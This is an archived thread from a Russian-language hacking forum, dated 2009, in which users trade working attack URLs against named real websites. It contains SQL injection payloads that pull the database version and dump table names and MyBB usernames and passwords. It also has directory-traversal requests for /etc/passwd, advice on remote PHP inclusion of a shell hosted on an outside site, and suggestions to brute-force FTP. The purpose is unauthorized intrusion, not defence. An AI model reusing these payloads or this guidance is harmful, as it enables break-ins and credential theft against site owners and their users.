ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
31.01.2009, 02:59
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от x311
http://trophymanager.com/klubhus.php?showclub=1'
нужна ренистпация, поля не смог подобрать .
Вот...
Код:
http://trophymanager.com/klubhus.php?showclub=1+and+1=0+union+select+1,2,version(),4,5,6,7,8,9,0,11,12,13,14--
Последний раз редактировалось R1dex; 31.01.2009 в 03:01..
|
|
|
30.01.2009, 23:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
x311, ну так скинь зареганный акк...
|
|
|
|
31.01.2009, 00:15
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
1.Гы))Вбивай кавычки везде )))
2.Ini_get()
3.phpinfo()
4.Мб CVS на сервере дежурит  .
5.Поискать инклуд или sql и попробывать прочесть файл.
6.Поглядеть исходники
7.Посмотреть в Гугле описание директивы mysql_quotes_gpc и не задавать этот вопрос снова |
|
|
|
31.01.2009, 07:08
|
|
Новичок
Регистрация: 30.07.2008
Сообщений: 18
Провел на форуме:
268783
Репутация:
0
|
|
http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world
что можно с этим добром сделать ? как дальше пройти?
|
|
|
|
31.01.2009, 08:43
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141
Репутация:
3099
|
|
Сообщение от Mirella
http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world
что можно с этим добром сделать ? как дальше пройти?
https://forum.antichat.ru/thread49775.html
http://forum.antichat.ru/showthread.php?p=400021
Последний раз редактировалось xcedz; 31.01.2009 в 08:46..
|
|
|
|
31.01.2009, 11:16
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Mirella
http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world
что можно с этим добром сделать ? как дальше пройти?
Чего-то я там не вижу php-include. Может прикрыли уже? Но как вариант было найти реальный путь, и инклюдить файлы, начиная с index'a и дойдя так до БД слогами, но надо, что бы там было читалка. Можно было провести удаленный php-include, т.е. file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!
|
|
|
|
31.01.2009, 18:41
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Сообщение от Tigger
file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!
Как он принимается за пхп,если не обрабатывается интерпретатором,если ток не указано в httpd.conf его обрабатывать как пхп сценарий.Или ты имеешь ввиду,что можно залить любой тхт файл ?
|
|
|
|
31.01.2009, 07:13
|
|
Banned
Регистрация: 27.01.2009
Сообщений: 9
Провел на форуме:
96622
Репутация:
27
|
|
Брутить ФТП или как вариант почитать сорцы конфигов движка с целью доступа к БД или мб к панели администратора
|
|
|
|
31.01.2009, 12:04
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--
Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
|
|
|
|
31.01.2009, 12:32
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
Assembler,
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%2001,concat(username,0x3a,passw ord)username%20from%20mybb_users+limit+0,1--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Комбинированный вид